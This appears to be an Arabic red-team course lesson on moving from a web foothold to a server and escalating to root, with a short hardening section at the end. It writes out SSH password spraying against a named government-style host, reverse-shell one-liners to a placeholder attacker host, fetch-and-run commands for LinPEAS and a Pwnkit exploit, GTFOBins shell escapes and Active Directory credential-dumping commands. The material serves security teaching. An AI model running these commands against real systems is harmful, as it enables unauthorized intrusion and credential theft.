الفرق الحمراء — الهجومخبير90mL05

استغلال الخوادم وتصعيد الصلاحيات

طرق استغلال السيرفرات وتصعيد صلاحيات المستخدم

#RCE#SSH#LinPEAS#GTFOBins

من الويب إلى السيرفر — تنفيذ الأوامر

تشبيه — شرح مبسط
فتحنا الباب الأمامي للمتجر (الويب). الآن نريد الدخول للمستودع الخلفي (السيرفر) ثم لمكتب المدير (root). كل خطوة تتطلب «مفتاحاً» مختلفاً.

الوصول الأولي — Initial Foothold

  • RCE عبر ثغرة ويب (سبق في الدرس السابق).
  • SSH brute force / spraying.
  • خدمة قديمة فيها CVE معروفة (Tomcat, Jenkins, GitLab).
  • مفاتيح مسرّبة من GitHub.
SSH spray (authorized only)
hydra -L users.txt -p 'Summer2026!' ssh://target.gov -t 4 -f
crackmapexec ssh target.gov -u root -k id_rsa.leaked

Reverse Shell — قلب الاختراق

تشبيه — شرح مبسط
الـ firewall يمنع الاتصالات الواردة لكن يسمح بالخارجة. الحل: نجعل السيرفر هو الذي يتصل بنا.
bash
# على جهاز المهاجم
nc -lnvp 4444
# على الضحية
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("A",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'
busybox nc ATTACKER 4444 -e sh
ترقية الـ shell
upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl-Z
stty raw -echo; fg
export TERM=xterm-256color

رفع الصلاحيات — Linux Privilege Escalation

أتمتة الفحص

$ wget http://ATTACKER/linpeas.sh -O /tmp/p.sh && bash /tmp/p.sh
[+] SUID binaries: /usr/bin/find — exploitable via GTFOBins [!] Writable /etc/passwd

طرق شائعة لـ root

  1. SUID binaries — راجع GTFOBins.
  2. Sudo misconfiguration — sudo -l ثم استغلال.
  3. Writable /etc/passwd — أضف مستخدماً بكلمة معروفة.
  4. Cron jobs تشغّل سكربتاً أنت تستطيع تعديله.
  5. Kernel exploits — DirtyPipe (CVE-2022-0847), Pwnkit (CVE-2021-4034).
  6. Docker socket — /var/run/docker.sock mounted = root.
  7. Capabilities — cap_setuid على binary.
GTFOBins examples
find . -exec /bin/sh -p \; -quit
sudo vim -c ':!/bin/sh'
curl -sLO https://raw.githubusercontent.com/.../pwnkit.c && gcc pwnkit.c -o pk && ./pk

رفع الصلاحيات — Windows

  • winPEAS، PowerUp.ps1، Seatbelt.
  • Unquoted Service Path.
  • AlwaysInstallElevated.
  • سرقة الـ tokens بـ Mimikatz / Rubeus.
  • Kerberoasting — استخراج SPN ثم كسر بـ hashcat.
Active Directory
GetUserSPNs.py corp.local/user:pass -dc-ip DC -request
GetNPUsers.py corp.local/ -usersfile users.txt -no-pass
secretsdump.py -just-dc corp.local/admin@DC

الدفاع: Server Hardening

  1. SSH: فقط مفاتيح، fail2ban، 2FA.
  2. إزالة كل SUID غير الضروري.
  3. تطبيق CIS Benchmarks.
  4. تفعيل auditd + شحن السجلات لـ SIEM.
  5. EDR مثل Wazuh / CrowdStrike / Defender for Endpoint.
  6. AppArmor / SELinux في وضع enforcing.
  7. تقسيم الشبكة لمنع الـ lateral movement.
قاعدة 1-10-60
CrowdStrike: اكتشاف خلال 1 دقيقة، تحقق خلال 10 دقائق، احتواء خلال 60 دقيقة.